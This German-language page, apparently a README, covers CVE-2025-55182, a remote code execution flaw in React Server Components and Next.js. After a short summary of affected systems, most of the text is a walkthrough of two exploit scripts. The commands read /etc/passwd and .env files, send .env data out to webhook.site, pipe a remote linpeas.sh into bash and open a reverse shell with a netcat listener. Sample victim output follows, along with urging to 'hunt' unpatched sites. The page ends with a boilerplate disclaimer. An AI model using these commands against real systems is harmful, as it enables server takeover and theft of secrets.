
CVE-2025-55182
✅ Das bedeutet, Angreifer könnten mit einer einzigen präparierten Anfrage potenziell beliebigen serverseitigen Code ausführen.
⚠️ Systeme, die React Server Components verwenden, einschließlich:
✅ React-Server-DOM-Pakete
✅ Frameworks, die RSC bündeln, wie z. B.:
❌ Nicht betroffen:
🔍 Nach transitiven verwundbaren Paketen suchen
🧾 Verwenden:
npm auditpnpm audityarn audit⚠️ Diese verringern nur das Risiko – sie ersetzen KEINEN Patch
✅ Full-Stack-Entwickler, die Next.js App Router verwenden
✅ DevOps-Teams, die React-SSR-Apps hosten
✅ Sicherheitsingenieure, die Folgendes überwachen:
🚨 Wenn Ihre App React Server Components verwendet und nicht gepatcht ist – ist sie möglicherweise bereits vollständig kompromittiert.
CVE-2025-55182.py (grundlegende RCE)
# Grundlegende Informationen
./CVE-2025-55182.py https://target.com "id"
./CVE-2025-55182.py https://target.com "whoami"
./CVE-2025-55182.py https://target.com "uname -a"
# Dateien lesen
./CVE-2025-55182.py https://target.com "cat /etc/passwd"
./CVE-2025-55182.py https://target.com "cat /app/.env"
# Daten exfiltrieren
./CVE-2025-55182.py https://target.com "curl -X POST https://webhook.site/your-id -d @/app/.env"
# Herunterladen und ausführen (falls wget/curl vorhanden)
./CVE-2025-55182.py https://target.com "curl -s http://your-ip:8000/linpeas.sh | bash"
CVE-2025-55182-revshell.py (sofortige Reverse Shell)
# 1. Listener starten (einmalig)
nc -lvnp 4444
# 2. Auslösen → Shell in <3 Sekunden
./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
Das war's buchstäblich.
Zwei Skripte, diese 8 Befehle → vollständige Kompromittierung jeder ungepatchten Next.js-Website heute.
Holen Sie sich Ihre Bountys.
Hier sehen Sie genau, was in Echtzeit passiert, wenn der Exploit funktioniert (100 % ungepatchtes Ziel, 3. Dezember 2025):
1. Wenn Sie das normale RCE-Skript (CVE-2025-55182.py) ausführen
Sie geben ein:
./CVE-2025-55182.py https://target.com "whoami"
Sie sehen sofort auf Ihrem Bildschirm:
[+] CVE-2025-55182 Exploit
[+] Target : https://target.com
[+] Command : whoami
[+] Sending payload ...
[+] Payload delivered successfully!
[+] HTTP 200 – Command should have executed on the server
[+] Server response:
node
→ Dieses „node“ (oder was auch immer der Befehl zurückgibt) ist die tatsächliche Ausgabe vom Opfer-Server.
Wenn Sie id ausführen, sehen Sie die vollständigen uid/gid-Zeilen usw.
2. Wenn Sie das Reverse-Shell-Skript (CVE-2025-55182-revshell.py) ausführen
Sie geben ein:
./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
Sie sehen sofort in Ihrem Listener-Terminal:
listening on [any] 4444 ...
connect to [10.10.14.66] from (UNKNOWN) [172.17.8.45] 54321
whoami
node
pwd
/app
ls -la
total 1234
drwxr-xr-x 1 node node 4096 Dec 3 12:34 .
drwxr-xr-x 1 root root 4096 Nov 30 10:11 ..
-rw-r--r-- 1 node node 420 Dec 3 11:11 .env
...
→ Vollständige interaktive TTY-Shell als Benutzer node (fast immer der Web-App-Benutzer). Sie besitzen die Box.
Das war's buchstäblich.
Wenn Sie eines der obigen sehen → Exploit hat zu 100 % funktioniert.
Wenn Sie nur HTTP 403/404 oder nichts erhalten → bereits gepatcht oder durch WAF blockiert.
Jetzt jagen.
Haftungsausschluss
Dieser PoC dient nur für autorisierte Sicherheitstests und Bildungszwecke.
Führen Sie ihn nicht gegen ein System aus, das Ihnen nicht gehört oder für das Sie keine explizite schriftliche Erlaubnis zum Testen haben.
Unbefugte Nutzung ist illegal und kann zu strafrechtlicher Verfolgung führen.
Verwenden Sie ihn nur in Ihrem Labor, in Bug-Bounty-Programmen mit klarem Umfang oder bei Zielen, die Ihnen die Erlaubnis gegeben haben.
Sie sind zu 100 % für Ihre Handlungen verantwortlich.